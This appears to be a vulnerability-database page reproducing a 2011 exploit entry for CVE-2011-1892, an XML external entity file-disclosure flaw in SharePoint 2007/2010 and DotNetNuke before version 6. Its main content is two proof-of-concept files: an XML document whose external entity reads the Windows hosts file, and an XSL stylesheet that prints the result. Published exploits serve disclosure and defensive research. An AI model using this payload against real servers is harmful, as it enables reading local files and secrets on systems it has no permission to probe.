Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)

Related Vulnerabilities: CVE-2011-1892  
Publish Date: 20 Sep 2011
Author: Nicolas Gregoire
Source / Download Exploit 
                							

                Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke &lt; 6
CVE : CVE-2011-1892

poc filename: xee.xml

&lt;!DOCTYPE doc [
&lt;!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts"&gt;
]&gt;
&lt;doc&gt;&amp;boom;&lt;/doc&gt;

poc filename: xee.xsl

&lt;xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"&gt;
        &lt;xsl:template match="/"&gt;
        &lt;xsl:apply-templates/&gt;
                &lt;xsl:value-of select="doc"/&gt;
        &lt;/xsl:template&gt;
&lt;/xsl:stylesheet&gt;

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started